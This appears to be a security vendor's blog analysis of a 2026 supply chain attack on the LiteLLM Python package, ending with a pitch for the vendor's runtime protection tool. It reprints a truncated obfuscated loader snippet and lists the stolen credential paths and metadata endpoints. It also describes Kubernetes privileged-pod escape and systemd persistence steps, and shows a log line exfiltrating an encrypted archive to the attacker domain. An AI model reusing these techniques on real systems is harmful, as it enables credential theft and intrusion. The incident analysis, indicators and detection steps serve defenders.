← All Posts Vitalii Rudnykh
Security Research

LiteLLM Supply Chain Attack: How 12 Lines of Code Compromised 95 Million Downloads

On March 24, 2026, TeamPCP published two malicious versions of LiteLLM to PyPI. Within three hours, a credential-stealing payload reached AI infrastructure across 36% of monitored cloud environments.

0
Monthly Downloads
0
Exposure Window
0
Exfil Events
0
Cloud Envs Hit

This Is Not an AI Vulnerability

Before we dive in: this attack has nothing to do with LLM prompt injection, model jailbreaks, or AI safety. It's a software supply chain attack — the same class of threat that hit SolarWinds, Codecov, and ua-parser-js. The target just happens to be AI infrastructure. The vulnerability is in how packages are built, signed, and delivered — not in the models themselves.

What Is LiteLLM?

LiteLLM is a Python library that lets you call 100+ LLM APIs through a single interface. In proxy mode, it becomes a centralized AI gateway handling API keys, load balancing, and spend tracking. It's a transitive dependency in CrewAI, DSPy, MLflow, and LangChain — most teams don't know they run it. A library that handles every API key in your AI stack, installed 95M times per month. A perfect target.

How It Happened

Trivy
Feb 28
KICS
Mar 23
LiteLLM
Mar 24

TeamPCP didn't attack LiteLLM directly. Over the preceding month, they compromised two security scanners — Aqua Trivy and Checkmarx KICS — through misconfigured GitHub Actions, stealing CI/CD credentials at each step. Each compromise yielded tokens that unlocked the next target.

The final link: LiteLLM's CI pipeline ran apt-get install trivywithout pinning a version. It pulled the already-poisoned Trivy v0.69.4, which harvested the PYPI_PUBLISH token — the key to publishing Python packages under the LiteLLM name.

The Injection: Two Techniques in 13 Minutes

Version 1.82.7 (published 10:39 UTC) took the straightforward approach: 12 lines of obfuscated code injected into litellm/proxy/proxy_server.py at lines 128–139. The payload used double-base64 encoding — a ~4KB encoded string that decoded to a temp file and executed via subprocess.run(). It triggered whenever the proxy module was imported — which happens on every litellm --proxy start:

# Lines 128-139 of proxy_server.py (v1.82.7)
import subprocess, sys, base64, tempfile
_enc = "aW1wb3J0IH..."  # double-base64 (~4KB decoded)
_dec = base64.b64decode(base64.b64decode(_enc))
with tempfile.NamedTemporaryFile(suffix='.py', delete=False) as f:
    f.write(_dec); f.flush()
    subprocess.run([sys.executable, f.name])

Version 1.82.8 (published 10:52 UTC — just 13 minutes later) escalated the attack. It kept the proxy_server.py injection but added a far more dangerous mechanism: a litellm_init.pth file included directly in the wheel package.

The .pth Mechanism: Why It's Devastating

Python's .pth files are normally used to extend sys.path, but any line starting with import is executed as code during interpreter initialization — before any user script runs. This means:

  • The malware fires on any python command — not just LiteLLM imports
  • It runs before if __name__ == "__main__" — no way to guard against it
  • The file was correctly declared in the wheel's RECORD file, so pip --require-hashes would have passed — the hash was valid because the malicious content was published with legitimate credentials
  • It persists across virtualenv recreation — as long as the package is installed, the .pth executes

A critical bug: the .pth launcher spawned child processes via subprocess.Popen, which started new Python interpreters, which triggered the .pth again — creating an exponential fork bomb that crashed machines within seconds. This "bug in the malware" was likely the single biggest factor in accelerating detection, as affected systems became visibly unstable.

PyPI quarantined both versions at approximately 11:25 UTC — roughly three hours after the first publication. During that window, LiteLLM was averaging 3.4 million downloads per day.

The Payload

Click to expand each stage.

1

Credential Harvester

The first stage performed a comprehensive sweep of the host. It wasn't just reading files — it actively queried APIs to validate and expand the collected credentials:

  • SSHid_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, config, known_hosts
  • AWS~/.aws/credentials, ~/.aws/config, IMDSv2 metadata (169.254.169.254/latest/meta-data/iam/security-credentials/), ECS task role credentials via $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
  • GCP — service account JSON files, application default credentials (~/.config/gcloud/), compute metadata tokens
  • Azure — managed identity tokens via 169.254.169.254/metadata/identity/oauth2/token
  • Kubernetes~/.kube/config, in-cluster service account tokens at /var/run/secrets/kubernetes.io/, enumerated and dumped secrets across all accessible namespaces
  • CI/CD — Terraform state files (often contain cloud credentials in plaintext), GitLab CI tokens, Jenkins credentials.xml, Travis CI tokens, .npmrc, .pypirc
  • Databases.pgpass, my.cnf, Redis/MongoDB connection strings
  • Crypto wallets — Bitcoin (wallet.dat), Ethereum keystores, Solana keypairs
  • Application secretsevery .env file reachable from the user's home directory, .gitconfig, shell history (.bash_history, .zsh_history), Slack/Discord webhooks, Stripe API keys, SendGrid tokens
credential sweep — reconstructed from payload analysis
reading ~/.ssh/id_rsa
reading ~/.ssh/id_ed25519
reading ~/.aws/credentials
querying 169.254.169.254/meta-data/iam/
reading ~/.kube/config
dumping kubectl get secrets --all-namespaces
reading /app/.env
reading ~/.config/gcloud/credentials.db
reading ~/.bash_history
archiving tpcp.tar.gz (2.4MB)
encrypting AES-256-CBC → RSA-4096 envelope
POST models.litellm[.]cloud → 200 OK

Encryption Pipeline

The exfiltration wasn't naive. Collected data was encrypted using a multi-layer scheme:

  1. Generate random AES-256-CBC session key + IV
  2. Derive key material using PBKDF2
  3. Encrypt the archive with the session key
  4. Encrypt the session key with a hardcoded 4096-bit RSA public key (only the attacker holds the private key)
  5. Package as tpcp.tar.gz and POST to models.litellm[.]cloud with header X-Filename: tpcp.tar.gz

This means even if you captured the network traffic, you cannot decrypt the exfiltrated data without the attacker's RSA private key.

2

Kubernetes Lateral Movement

If Kubernetes service account tokens were found on the host, the malware escalated from credential theft to active cluster compromise:

  1. Read cluster secrets across all accessible namespaces via the K8s API
  2. Enumerated all nodes in the cluster
  3. For each node, deployed a privileged alpine:latest pod named node-setup-{node_name} in the kube-system namespace
  4. The pod mounted the host root filesystem at / via hostPath volume
  5. Inside the pod: chroot /host to escape the container, then installed the CanisterWorm backdoor directly on the node's filesystem

Container names alternated between kamikaze and provisioner — the former used for destructive operations, the latter for persistence.

For hosts with Tehran timezone or Farsi language settings, the behavior changed entirely: instead of persisting, the malware deployed a wiper that destroyed Kubernetes cluster data. This targeted destructive capability against Iranian infrastructure suggests geopolitical motivation beyond pure financial gain.

3

Persistent Backdoor

The final stage ensured long-term access through a systemd user service — requiring no root privileges:

  • Wrote persistence script to ~/.config/sysmon/sysmon.py
  • Created systemd user unit at ~/.config/systemd/user/sysmon.service, labeled "System Telemetry Service" to blend in with legitimate monitoring
  • Initial 300-second sleep before first activation (evade sandbox analysis)
  • Polled checkmarx[.]zone/raw every ~50 minutes for payload URLs
  • Downloaded payloads to /tmp/pglog, executed in detached sessions via setsid
  • Tracked beacon state in /tmp/.pg_state to avoid redundant downloads
  • Filtered YouTube links as a kill-switch — if the C2 returned a YouTube URL, the payload was skipped (allowing the attacker to "pause" operations)

This persistence survived reboots, pip uninstall litellm, and virtual environment recreation. The only remediation was finding and deleting the sysmon files manually, or rebuilding from a clean image.

When Sonatype researchers attempted to retrieve the C2 payload during analysis, the endpoint returned a link to an English remaster of "Bad Apple!!" — a deliberate troll that also defeated automated sandbox analysis.

Suppression & Impact

When security researchers filed GitHub issue #24512 reporting the compromise, TeamPCP used the stolen maintainer account to close it as "not planned" — making it appear the legitimate maintainers had dismissed the report. The issue was simultaneously flooded with bot comments from accounts matching botnets previously observed during the Trivy disclosure, burying legitimate analysis under noise.

The attack's C2 domain — models.litellm.cloud — was deliberately chosen to mimic legitimate LiteLLM infrastructure, making network-level detection harder for defenders scanning for suspicious domains.

Across the full campaign (Trivy → npm → KICS → LiteLLM), TeamPCP claimed to have "stolen hundreds of gigabytes of data and more than half a million accounts." Over 20,000 repositories were considered potentially vulnerable. LiteLLM itself was present in 36% of monitored cloud environments according to Wiz research.

IoCs & Forensics

TypeIndicatorContext
PyPIlitellm==1.82.7proxy_server.py injection
PyPIlitellm==1.82.8+ .pth persistence
SHA-256 Hashes
proxy_server.pya0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120bv1.82.7
litellm_init.pth71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238v1.82.8
sysmon.py6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92aBackdoor
Network
C2models.litellm[.]cloudExfiltration
C2checkmarx[.]zoneBackdoor polling
IP45.148.10.212aquasecurtiy[.]org
IP83.142.209.11checkmarx[.]zone
Filesystem & K8s
File~/.config/sysmon/sysmon.pyPersistence
Systemd~/.config/systemd/user/sysmon.serviceUser service
K8snode-setup-{name}kube-system pods
Archivetpcp.tar.gzExfil bundle

Detection & Remediation

If you installed LiteLLM between Mar 24 10:39–11:25 UTC → full credential exposure.

  • Check version: pip show litellm | grep Version
  • Find .pth: find "$(python -c 'import site;print(site.getsitepackages()[0])')" -name "litellm_init.pth"
  • Check persistence: ls ~/.config/sysmon/ ~/.config/systemd/user/sysmon.service
  • Audit K8s: kubectl get pods -n kube-system | grep node-setup
  • Rotate ALL credentials from affected environment
  • Rebuild from clean image — persistence survives pip uninstall

How Imunify for AI Agents Stops This

Once a package is installed, nothing inspects what it does at runtime. Imunify for AI Agents fills this gap with kernel-level interception — eBPF hooks, fanotify, transparent HTTP proxy.

The Kill Chain — Every Stage Blocked

Step 1
Read credentials
File access frozen. Policy denies read. Secret patterns detected in content.
Step 2
Encrypt & archive
Nothing to encrypt — all reads were denied. Empty result.
Step 3
Send to attacker
Network connection denied at kernel level. Data never leaves the machine.
Step 4
Install backdoor
Write to system directories denied. Persistence never installed.
All 4 stages neutralized — process killed by Imunify for AI Agents

Instant Discovery

eBPF

When LiteLLM starts, a kernel-level sched_process_exec hook detects it instantly — PID tracked before the process runs its first instruction. No polling, no delay.

File Read Blocking

Fanotify

Every file LiteLLM opens is intercepted — the process is frozen in the kernel until policy decides. The compromised version's attempt to sweep credentials from .env, SSH keys, and cloud configs is denied on each read. A content scanner with 200+ secret patterns catches credentials even in unexpected file paths.

Network Correlation

Rules

Cross-event correlation rules catch the exact pattern this attack uses: if LiteLLM (or any tracked process) reads .env files and then attempts an outbound HTTP connection, the connection is automatically blocked — no human decision needed. Unknown destinations require explicit approval via Telegram, Discord, or Web UI before any data leaves the machine.

Behavioral Kill

Auto

When the compromised LiteLLM triggers a rapid burst of blocked file reads — the exact pattern of a credential harvester scanning the filesystem — Imunify for AI Agents automatically kills the process. No human intervention. The attack dies before it finishes its first sweep.

Imunify for AI Agents Blocking the LiteLLM Attack in Real Time

Conclusion

Supply chain attacks cascade. One misconfigured GitHub Action → credential theft → npm → KICS → PyPI. Incomplete remediation at each step left doors open.

Build-time security is necessary but insufficient. Signatures and hashes don't help when a compromised version is published with valid credentials. Runtime interception watches what code does, not where it came from.

Twelve lines. Three hours. Ninety-five million downloads. The next attack won't look like this one — but the syscalls will be the same.